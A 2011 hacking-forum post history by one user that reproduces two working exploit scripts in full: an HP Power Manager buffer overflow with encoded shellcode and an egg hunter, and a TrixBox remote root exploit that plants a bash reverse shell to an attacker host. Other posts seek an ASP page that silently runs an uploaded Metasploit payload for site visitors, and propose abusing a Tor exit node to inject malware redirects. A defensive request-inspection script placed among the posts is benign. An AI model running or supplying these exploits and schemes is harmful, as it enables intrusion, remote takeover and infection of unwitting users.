Show Posts



Messages - pl4f0rd

Pages: [1] 2
1
Hacking and Security / Re: Help getting exploit working
« on: July 19, 2011, 07:17:40 pm »
yes, tried that, this is needed as it's the unique string for the egg hunter which has to be placed before the shellcode.  It's kind of a marker.

It's been baffling me for a few days now  :o



2
Hacking and Security / Help getting exploit working
« on: July 19, 2011, 06:09:26 pm »
I need to get this working on a Windows 7 box

The RET address is universal

The box is exploitable

I think it's something to do with the Egg Hunter appended "n00bn00b"

Any help would be appreciated 
Code:
import sys
from socket import *
 
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"
 
try:
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
   sys.exit()
 
PORT  = 80
RET   = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
 
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x38"
"\x4e\x56\x46\x32\x46\x42\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x38"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x52\x45\x47\x45\x4e\x4b\x58"
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x48"
"\x49\x38\x4e\x36\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x43\x4b\x4d"
"\x46\x46\x4b\x38\x43\x54\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
"\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x46"
"\x50\x48\x50\x34\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
"\x43\x45\x48\x46\x4a\x36\x43\x43\x44\x33\x4a\x46\x47\x47\x43\x57"
"\x44\x33\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
"\x48\x36\x41\x38\x4d\x4e\x4a\x30\x44\x50\x45\x35\x4c\x56\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x45\x43\x35\x43\x34"
"\x43\x35\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x41"
"\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a"
"\x4c\x31\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x51"
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x56\x4a\x46\x43\x36"
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x56\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x34\x4e\x42"
"\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x55\x41\x45\x41\x35\x4c\x56"
"\x41\x30\x41\x55\x41\x45\x45\x35\x41\x35\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")
 
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
 
evil =  "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()

3
Hacking and Security / Re: Cracking wifi passwords
« on: July 15, 2011, 11:01:23 pm »
Check out my video: http://www.youtube.com/watch?v=XsFVz1K3sZo&feature=fvsr. The quality is a bit shitty but it should get you started.

4
Great  ;D


Works like a charm


Thanks

5
Well it's deffo running the right version, see screenshot, so there must be a way to get this code to work somehow.

6
So you got any ideas on how I can get the session?

7

Have an error in the below code and not sure why; I'm guessing it has something to do with the def find_sessionid part.


Any help would be greatly appreciated


Error below


Code:
   tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
TypeError: cannot concatenate 'str' and 'NoneType' objects


Code:
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep
 
print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
 
if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
    exit(0)
 
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
 
 
def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: 192.168.219.132 \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer
 
def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send(input)
    output=s.recv(1024)
    s.close()
    return output
 
def find_sessionid(http_output):
    headers=re.split("\n",http_output)
    for header in headers:
            if re.search("Set-Cookie",header):
                    cook=header.split(" ")
            sessionid=cook[1][10:42]
                    print "[*] Session ID is %s" % sessionid
            return sessionid
 
 
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
 
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
 
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
 
print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"
 
# milw0rm.com [2008-07-12]
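A defender's counterpart to the two requests in this thread and in the HP Power Manager thread above, added here as an example that is not part of pl4f0rd's posts or of the original exploit authors' code. It is a small Python 3 inspector for application/x-www-form-urlencoded POST requests that flags the traits both requests share: a single form field or header far larger than a browser would send, non-printable bytes in a text field, a null byte, a `../` path component, or a PHP open tag in a value. The sample requests are constructed for this demo with filler bytes where a payload would sit, the host address is a documentation-range placeholder, and the two size thresholds are assumptions to be tuned per parameter.

```python
import re
from urllib.parse import unquote_to_bytes

# Size thresholds are assumptions chosen for this demo; production rules
# are tuned per parameter. The overflow request in the HP Power Manager
# thread puts ~580 bytes into one login field and ~700 bytes of payload
# into User-Agent; the TrixBox request puts a traversal path and a %00
# into langChoice.
MAX_FIELD_LEN = 128
MAX_HEADER_LEN = 512

# "../" or "..\" as a path component, checked after one round of percent-decoding.
TRAVERSAL_RE = re.compile(rb"(^|[\\/])\.\.([\\/]|$)")


def parse_form_body(body: bytes) -> dict:
    """Split a form-urlencoded body into {name: raw_value_bytes}.

    Values are percent-decoded once so %00 and %2e%2e become visible;
    '+' is left alone so binary payload bytes are not altered."""
    fields = {}
    for pair in body.split(b"&"):
        name, _, value = pair.partition(b"=")
        fields[unquote_to_bytes(name).decode("latin-1")] = unquote_to_bytes(value)
    return fields


def field_findings(name: str, value: bytes) -> list:
    """Return (rule, detail) tuples for one decoded form field."""
    findings = []
    if len(value) > MAX_FIELD_LEN:
        findings.append(("oversized_field", f"{name}: {len(value)} bytes"))
    nonprint = sum(1 for b in value if b < 0x20 or b > 0x7E)
    if nonprint:
        findings.append(("binary_content", f"{name}: {nonprint} non-printable bytes"))
    if b"\x00" in value:
        findings.append(("null_byte", name))
    if TRAVERSAL_RE.search(value):
        findings.append(("path_traversal", name))
    if b"<?php" in value.lower():
        findings.append(("php_tag", name))
    return findings


def header_findings(head: bytes) -> list:
    """Flag request headers whose value is far larger than any browser sends."""
    findings = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        if len(value.strip()) > MAX_HEADER_LEN:
            findings.append(("oversized_header", f"{name.decode('latin-1')}: {len(value.strip())} bytes"))
    return findings


def inspect_post(raw_request: bytes) -> list:
    """Inspect one raw HTTP request (headers + body); non-POSTs yield nothing."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    if not head.startswith(b"POST "):
        return []
    findings = header_findings(head)
    for name, value in parse_form_body(body).items():
        findings.extend(field_findings(name, value))
    return findings


# Constructed samples, not captured traffic: the shapes of the requests
# from the two threads with filler bytes where a payload would sit, and a
# documentation-range address (203.0.113.10) as the host.
SAMPLE_OVERFLOW = b"".join([
    b"POST http://203.0.113.10/goform/formLogin HTTP/1.1\r\n",
    b"Host: 203.0.113.10\r\n",
    b"User-Agent: " + b"X" * 700 + b"\r\n",
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n",
    b"HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin",
    b"A" * 256 + b"\x90" * 32 + b"B" * 287 + b"\r\n",
])
SAMPLE_TRAVERSAL = b"".join([
    b"POST /user/index.php HTTP/1.1\r\n",
    b"Host: 203.0.113.10\r\n",
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n",
    b"langChoice=../../../../../../../../../../tmp/sess_" + b"0" * 32 + b"%00",
])
SAMPLE_INJECTION = b"".join([
    b"POST /user/index.php HTTP/1.1\r\n",
    b"Host: 203.0.113.10\r\n",
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n",
    b"langChoice=%3C%3Fphp+echo+1%3B+%3F%3E",
])
SAMPLE_BENIGN = b"".join([
    b"POST /user/index.php HTTP/1.1\r\n",
    b"Host: 203.0.113.10\r\n",
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n",
    b"langChoice=english",
])

if __name__ == "__main__":
    for label, req in [("overflow", SAMPLE_OVERFLOW), ("traversal", SAMPLE_TRAVERSAL),
                       ("injection", SAMPLE_INJECTION), ("benign", SAMPLE_BENIGN)]:
        print(label, inspect_post(req) or "clean")
```

Two design points worth noting: the values are percent-decoded exactly once, because decoding twice would let `%252e%252e` slip through as `..` in a way the application itself may never see, and the User-Agent header is checked as well as the body, since in the HP Power Manager request the shellcode travels in that header and only the stack-smashing filler and the egg hunter sit in the login field.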


8
VB - VB.NET - C# - C++.NET / Re: ASP code for msfpayload
« on: July 13, 2011, 05:40:04 pm »
Cheers, I will give it a whirl

9
VB - VB.NET - C# - C++.NET / Re: ASP code for msfpayload
« on: July 13, 2011, 04:50:17 pm »
Well yeah, I got a shell, however it's unprivileged and running as IUSR. I uploaded the exe to the web server and I navigate to it and manually click on the exe, which in turn loads me up a shell via the multi/handler.


The meterpreter shell times out, can't getsystem, or sysinfo, or drop into a shell.


The exe is not asp it's clicked on directly in the Scripts directory and loaded as an exe.


I need an asp page that loads the exe by itself without me clicking on it. So for example the user navigates to the site and the exe is executed.




10
General discussion / Re: IRC link
« on: July 13, 2011, 04:25:21 pm »
"cannot connec to host. maybe you mispelled it!"

11
General discussion / IRC link
« on: July 13, 2011, 04:12:27 pm »
IRC link no longer works for me.

12
VB - VB.NET - C# - C++.NET / ASP code for msfpayload
« on: July 13, 2011, 03:38:39 pm »
I've uploaded a Metasploit payload to an IIS web server in the Scripts directory. Currently I am executing the script directly from the browser, which in turn is causing me problems.  Anyone got any ideas how I can create a dummy asp page which in turn executes my payload, which will run server side?

13
Hacking and Security / Re: Hey, IM LOST
« on: March 27, 2011, 11:02:57 am »
BackTrack 5 (Unreleased at this time) is actually built off of Ubuntu ;)

Source:
http://www.backtrack-linux.org/backtrack/backtrack-5-release-tool-suggestions/

Not sure if BT4 is built off of slax or ubuntu for sure.

Yeah very true, I was just thinking back to the time when I was a newbie. I could never get to grips with backtrack for some reason, I tried to immerse myself in it daily but it's just not built to be an everyday system, even BT R2 still doesn't feel finished if you know what I mean  :o Let's hope BT 5 is just like Ubuntu as that's a pretty easy to use and stable OS.

My main point really is it's better to immerse yourself daily in what you want to learn; with Ubuntu you can do this, for example your network/wireless will show up automatically, in BT it doesn't and could confuse the beginner.

Also, the BT forums are not very friendly if you require help.

14
Anonymity / Re: Tor project
« on: March 27, 2011, 10:28:19 am »
Very true, it is slow and leaves too many logs about. I think they are currently working on the speed issue.

On the plus side though, you could be an exit node for the onion network; this way you can see all the traffic and get up to all sorts of mischief. You could modify the traffic for your own gain, or do MITM attacks by injecting some JavaScript to redirect to a malicious website to install malware.

I would recommend either a highly anonymous proxy or using an ssh tunnel for proxy connections.

Even better nowadays is the use of cellular connections, pretty hard to track as normally each time you connect they are dynamically assigned; of course the operator could tie the IP to you.  So if you think someone is tracking your activities, just reconnect.

15
Hacking and Security / Re: Hey, IM LOST
« on: March 27, 2011, 10:10:46 am »
Well Unix is pretty universal... Lol anyways it would be best to learn your way around a linux distro and the command line. Some, well most, hacking programs that you would commonly use for hacking are developed for a Linux Distribution. I would suggest checking out BackTrack. This is a Penetration testing distro and has a lot of tools to learn from.

I would suggest getting familiar with Ubuntu, which is a little more user friendly than Backtrack at first.  To use some of the tools in BT you have to know your way around Linux pretty well.  You can get most of the hacking tools installed on Ubuntu too.


